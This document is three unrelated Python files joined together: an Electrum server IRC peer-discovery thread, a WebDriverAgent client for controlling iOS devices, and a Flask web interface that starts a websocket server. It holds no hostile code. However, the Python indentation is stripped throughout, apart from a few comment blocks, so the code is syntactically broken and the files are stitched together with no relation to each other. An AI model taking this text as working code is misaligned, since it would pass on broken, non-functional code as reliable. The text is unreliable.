# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import re
import time
import socket
import ssl
import threading
import Queue
import irc.client
from utils import logger
from utils import Hash
from version import VERSION
out_msg = []
class IrcThread(threading.Thread):
def __init__(self, processor, config):
threading.Thread.__init__(self)
self.processor = processor
self.daemon = True
options = dict(config.items('server'))
self.stratum_tcp_port = options.get('stratum_tcp_port')
self.stratum_tcp_ssl_port = options.get('stratum_tcp_ssl_port')
self.report_stratum_tcp_port = options.get('report_stratum_tcp_port')
self.report_stratum_tcp_ssl_port = options.get('report_stratum_tcp_ssl_port')
self.irc_bind_ip = options.get('irc_bind_ip')
self.host = options.get('host')
self.report_host = options.get('report_host')
self.nick = options.get('irc_nick')
if self.report_stratum_tcp_port:
self.stratum_tcp_port = self.report_stratum_tcp_port
if self.report_stratum_tcp_ssl_port:
self.stratum_tcp_ssl_port = self.report_stratum_tcp_ssl_port
if self.report_host:
self.host = self.report_host
if not self.nick:
self.nick = Hash(self.host)[:5].encode("hex")
self.pruning = True
self.pruning_limit = config.get('leveldb', 'pruning_limit')
self.nick = 'E_' + self.nick
self.password = None
self.who_queue = Queue.Queue()
def getname(self):
s = 'v' + VERSION + ' '
if self.pruning:
s += 'p' + self.pruning_limit + ' '
def add_port(letter, number):
DEFAULT_PORTS = {'t':'50001', 's':'50002'}
if not number: return ''
if DEFAULT_PORTS[letter] == number:
return letter + ' '
else:
return letter + number + ' '
s += add_port('t',self.stratum_tcp_port)
s += add_port('s',self.stratum_tcp_ssl_port)
return s
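    # Example (assuming VERSION == "1.0", pruning_limit == "100" and the default
    # ports 50001/50002): getname() returns "v1.0 p100 t s ", i.e. version,
    # pruning limit and one letter per advertised default port.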
def start(self, queue):
self.queue = queue
threading.Thread.start(self)
def on_connect(self, connection, event):
connection.join("#electrum")
def on_join(self, connection, event):
m = re.match("(E_.*)!", event.source)
if m:
self.who_queue.put((connection, m.group(1)))
def on_quit(self, connection, event):
m = re.match("(E_.*)!", event.source)
if m:
self.queue.put(('quit', [m.group(1)]))
def on_kick(self, connection, event):
m = re.match("(E_.*)", event.arguments[0])
if m:
self.queue.put(('quit', [m.group(1)]))
def on_disconnect(self, connection, event):
logger.error("irc: disconnected")
raise BaseException("disconnected")
def on_who(self, connection, event):
line = str(event.arguments[6]).split()
try:
ip = socket.gethostbyname(line[1])
except:
# no IPv4 address could be resolved. Could be .onion or IPv6.
ip = line[1]
nick = event.arguments[4]
host = line[1]
ports = line[2:]
self.queue.put(('join', [nick, ip, host, ports]))
def on_name(self, connection, event):
for s in event.arguments[2].split():
if s.startswith("E_"):
self.who_queue.put((connection, s))
def who_thread(self):
while not self.processor.shared.stopped():
try:
connection, s = self.who_queue.get(timeout=1)
except Queue.Empty:
continue
#logger.info("who: "+ s)
connection.who(s)
time.sleep(1)
def run(self):
while self.processor.shared.paused():
time.sleep(1)
self.ircname = self.host + ' ' + self.getname()
# avoid UnicodeDecodeError using LenientDecodingLineBuffer
irc.client.ServerConnection.buffer_class = irc.buffer.LenientDecodingLineBuffer
logger.info("joining IRC")
t = threading.Thread(target=self.who_thread)
t.start()
while not self.processor.shared.stopped():
client = irc.client.Reactor()
try:
#bind_address = (self.irc_bind_ip, 0) if self.irc_bind_ip else None
#ssl_factory = irc.connection.Factory(wrapper=ssl.wrap_socket, bind_address=bind_address)
#c = client.server().connect('irc.freenode.net', 6697, self.nick, self.password, ircname=self.ircname, connect_factory=ssl_factory)
c = client.server().connect('irc.freenode.net', 6667, self.nick, self.password, ircname=self.ircname)
except irc.client.ServerConnectionError:
logger.error('irc', exc_info=True)
time.sleep(10)
continue
c.add_global_handler("welcome", self.on_connect)
c.add_global_handler("join", self.on_join)
c.add_global_handler("quit", self.on_quit)
c.add_global_handler("kick", self.on_kick)
c.add_global_handler("whoreply", self.on_who)
c.add_global_handler("namreply", self.on_name)
c.add_global_handler("disconnect", self.on_disconnect)
c.set_keepalive(60)
self.connection = c
try:
client.process_forever()
except BaseException as e:
logger.error('irc', exc_info=True)
time.sleep(10)
continue
logger.info("quitting IRC")
|
_wdapy.py
|
# coding: utf-8
import atexit
import base64
import io
import json
import logging
import subprocess
import sys
import threading
import time
import typing
import requests
from cached_property import cached_property
from logzero import setup_logger
from PIL import Image
from ._alert import Alert
from ._base import BaseClient
from ._logger import logger
from ._proto import *
from ._types import *
from .exceptions import *
from .usbmux import requests_usbmux, usbmux
class HTTPResponse:
def __init__(self, resp: requests.Response, err: requests.RequestException):
self._resp = resp
self._err = err
def is_success(self) -> bool:
return self._err is None and self._resp.status_code == 200
def json(self) -> dict:
assert self._resp is not None
try:
return self._resp.json()
except json.JSONDecodeError:
            raise RequestError("JSON decode error", self._resp.text)
def get_error_message(self) -> str:
        if self._resp is not None:
return self._resp.text
return str(self._err)
def raise_if_failed(self):
if self._err:
raise RequestError("HTTP request error", self._err)
if self._resp.status_code != 200:
raise RequestError(self._resp.status_code, self._resp.text)
class CommonClient(BaseClient):
def __init__(self, wda_url: str):
super().__init__(wda_url)
self.__ui_size = None
self.__debug = False
@property
def debug(self) -> bool:
return self.__debug
@debug.setter
    def debug(self, v: bool):
        self.__debug = v
        if v:
setup_logger(NAME)
else:
setup_logger(NAME, level=logging.INFO)
def app_start(self, bundle_id: str):
self.session_request(POST, "/wda/apps/launch", {
"bundleId": bundle_id
})
def app_terminate(self, bundle_id: str):
self.session_request(POST, "/wda/apps/terminate", {
"bundleId": bundle_id
})
def app_state(self, bundle_id: str) -> AppState:
value = self.session_request(POST, "/wda/apps/state", {
"bundleId": bundle_id
})["value"]
return AppState(value)
def app_current(self) -> AppInfo:
self.unlock()
st = self.status()
if st.session_id is None:
self.session()
data = self.request(GET, "/wda/activeAppInfo")
value = data['value']
return AppInfo.value_of(value)
def app_list(self) -> AppList:
value = self.session_request(GET, "/wda/apps/list")["value"][0]
return AppList.value_of(value)
def deactive(self, duration: float):
self.session_request(POST, "/wda/deactivateApp", {
"duration": duration
})
@cached_property
def alert(self) -> Alert:
return Alert(self)
def sourcetree(self) -> SourceTree:
data = self.request(GET, "/source")
return SourceTree.value_of(data)
def open_url(self, url: str):
self.session_request(POST, "/url", {
"url": url
})
def set_clipboard(self, content: str, content_type="plaintext"):
self.session_request(POST, "/wda/setPasteboard",{
"content": base64.b64encode(content.encode()).decode(),
"contentType": content_type
})
def appium_settings(self, kwargs: dict = None) -> dict:
if kwargs is None:
return self.session_request(GET, "/appium/settings")["value"]
payload = {"settings": kwargs}
return self.session_request(POST, "/appium/settings", payload)["value"]
def is_locked(self) -> bool:
return self.request(GET, "/wda/locked")["value"]
def unlock(self):
self.request(POST, "/wda/unlock")
def lock(self):
self.request(POST, "/wda/lock")
def homescreen(self):
self.request(POST, "/wda/homescreen")
def shutdown(self):
self.request(GET, "/wda/shutdown")
def get_orientation(self) -> Orientation:
value = self.session_request(GET, '/orientation')['value']
return Orientation(value)
def window_size(self) -> typing.Tuple[int, int]:
"""
Returns:
UISize
"""
        # small speed optimization: derive the screen size from the screenshot dimensions
orientation = self.get_orientation()
if self.__ui_size is None:
            # assume the orientation of the returned screenshot is correct
pixel_width, pixel_height = self.screenshot().size
w, h = pixel_width//self.scale, pixel_height//self.scale
if self.get_orientation() == Orientation.PORTRAIT:
self.__ui_size = (w, h)
else:
self.__ui_size = (h, w)
if orientation == Orientation.LANDSCAPE:
return self.__ui_size[::-1]
else:
return self.__ui_size
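    # Example (assumptions: a screenshot of 640x1136 pixels and scale == 2):
    # window_size() returns (320, 568) in portrait and (568, 320) in landscape,
    # because the cached portrait size is simply reversed for landscape.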
def send_keys(self, value: str):
""" input with some text """
self.session_request(POST, "/wda/keys", {"value": list(value)})
def tap(self, x: int, y: int):
self.session_request(POST, "/wda/tap/0", {"x": x, "y": y})
def swipe(self,
from_x: int,
from_y: int,
to_x: int,
to_y: int,
duration: float = 0.5):
payload = {
"fromX": from_x,
"fromY": from_y,
"toX": to_x,
"toY": to_y,
"duration": duration}
self.session_request(POST, "/wda/dragfromtoforduration", payload)
def press(self, name: Keycode):
payload = {
"name": name
}
self.session_request(POST, "/wda/pressButton", payload)
def press_duration(self, name: Keycode, duration: float):
hid_usages = {
"home": 0x40,
"volumeup": 0xE9,
"volumedown": 0xEA,
"power": 0x30,
"snapshot": 0x65,
"power_plus_home": 0x65
}
name = name.lower()
if name not in hid_usages:
raise ValueError("Invalid name:", name)
        usage = hid_usages[name]
        payload = {
            "page": 0x0C,
            "usage": usage,
"duration": duration
}
return self.session_request(POST, "/wda/performIoHidEvent", payload)
@cached_property
def scale(self) -> int:
# Response example
# {"statusBarSize": {'width': 320, 'height': 20}, 'scale': 2}
value = self.session_request(GET, "/wda/screen")['value']
return value['scale']
def status_barsize(self) -> StatusBarSize:
# Response example
# {"statusBarSize": {'width': 320, 'height': 20}, 'scale': 2}
value = self.session_request(GET, "/wda/screen")['value']
return StatusBarSize.value_of(value['statusBarSize'])
def screenshot(self) -> Image.Image:
""" take screenshot """
value = self.request(GET, "/screenshot")["value"]
raw_value = base64.b64decode(value)
buf = io.BytesIO(raw_value)
im = Image.open(buf)
return im.convert("RGB")
def battery_info(self) -> BatteryInfo:
data = self.session_request(GET, "/wda/batteryInfo")["value"]
return BatteryInfo.value_of(data)
@property
def info(self) -> DeviceInfo:
return self.device_info()
def device_info(self) -> DeviceInfo:
data = self.session_request(GET, "/wda/device/info")["value"]
return DeviceInfo.value_of(data)
class XCUITestRecover(Recover):
def __init__(self, udid: str):
self._udid = udid
def recover(self) -> bool:
""" launch by tidevice
https://github.com/alibaba/tidevice
"""
logger.info("WDA is starting using tidevice ...")
args = [sys.executable, '-m', 'tidevice', '-u', self._udid, 'xctest']
p = subprocess.Popen(args,
stdin=subprocess.DEVNULL,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
start_new_session=True,
close_fds=True, encoding="utf-8")
success = False
deadline = time.time() + 10
while time.time() < deadline:
if p.poll() is not None:
logger.warning("xctest exit, output: %s", p.stdout.read())
return False
line = p.stdout.readline().strip()
# logger.info("%s", line)
if "WebDriverAgent start successfully" in line:
logger.info("WDA started")
success = True
break
def drain_stdout():
while p.stdout.read() != "":
pass
if success:
threading.Thread(target=drain_stdout, daemon=True).start()
atexit.register(p.kill)
return success
class AppiumClient(CommonClient):
"""
client for https://github.com/appium/WebDriverAgent
"""
def __init__(self, wda_url: str = DEFAULT_WDA_URL):
super().__init__(wda_url)
class AppiumUSBClient(AppiumClient):
def __init__(self, udid: str = None, port: int = 8100):
if udid is None:
_usbmux = usbmux.Usbmux()
udid = _usbmux.get_single_device_udid()
super().__init__(requests_usbmux.DEFAULT_SCHEME+udid+f":{port}")
self.set_recover_handler(XCUITestRecover(udid))
class NanoClient(AppiumClient):
"""
Repo: https://github.com/nanoscopic/WebDriverAgent
This repo changes a lot recently and the new version code drop the HTTP API to NNG
So here use the old commit version
https://github.com/nanoscopic/WebDriverAgent/tree/d07372d73a4cc4dc0b0d7807271e6d7958e57302
"""
def tap(self, x: int, y: int):
""" fast tap """
self.request(POST, "/wda/tap", {
"x": x,
"y": y,
})
def swipe(self,
from_x: int,
from_y: int,
to_x: int,
to_y: int,
duration: float = .5):
""" fast swipe """
self.request(POST, "/wda/swipe", {
"x1": from_x,
"y1": from_y,
"x2": to_x,
"y2": to_y,
"delay": duration})
class NanoUSBClient(NanoClient):
def __init__(self, udid: str = None, port: int = 8100):
if udid is None:
_usbmux = usbmux.Usbmux()
udid = _usbmux.get_single_device_udid()
super().__init__(requests_usbmux.DEFAULT_SCHEME+udid+f":{port}")
self.set_recover_handler(XCUITestRecover(udid))
|
__init__.py
|
from flask import Flask
import asyncio
import websockets
import threading
from lib.functions import get_ip_address
import time
UPLOAD_FOLDER = 'Songs/'
webinterface = Flask(__name__, template_folder='templates')
webinterface.config['TEMPLATES_AUTO_RELOAD'] = True
webinterface.config['UPLOAD_FOLDER'] = UPLOAD_FOLDER
webinterface.config['MAX_CONTENT_LENGTH'] = 32 * 1000 * 1000
webinterface.socket_input = []
print("Socket listening on: " + str(get_ip_address())+":8765")
def start_server():
async def echo(websocket):
while True:
            await asyncio.sleep(0.01)
for msg in webinterface.learning.socket_send[:]:
#print("input msg: " + str(msg))
await websocket.send(str(msg))
webinterface.learning.socket_send.remove(msg)
#message = websocket.recv()
async def main():
async with websockets.serve(echo, get_ip_address(), 8765):
await asyncio.Future()
asyncio.run(main())
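# Minimal client sketch for manual testing (an assumption, not part of the web
# interface itself; the endpoint ws://<ip>:8765 matches the server started above):
def _example_client(uri):
    async def _recv_loop():
        # connect and print whatever the learning loop pushes onto socket_send
        async with websockets.connect(uri) as ws:
            while True:
                print(await ws.recv())
    asyncio.run(_recv_loop())
# e.g. run in a separate process: _example_client("ws://" + get_ip_address() + ":8765")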
processThread = threading.Thread(target=start_server, daemon=True)
processThread.start()
from webinterface import views
from webinterface import views_api
|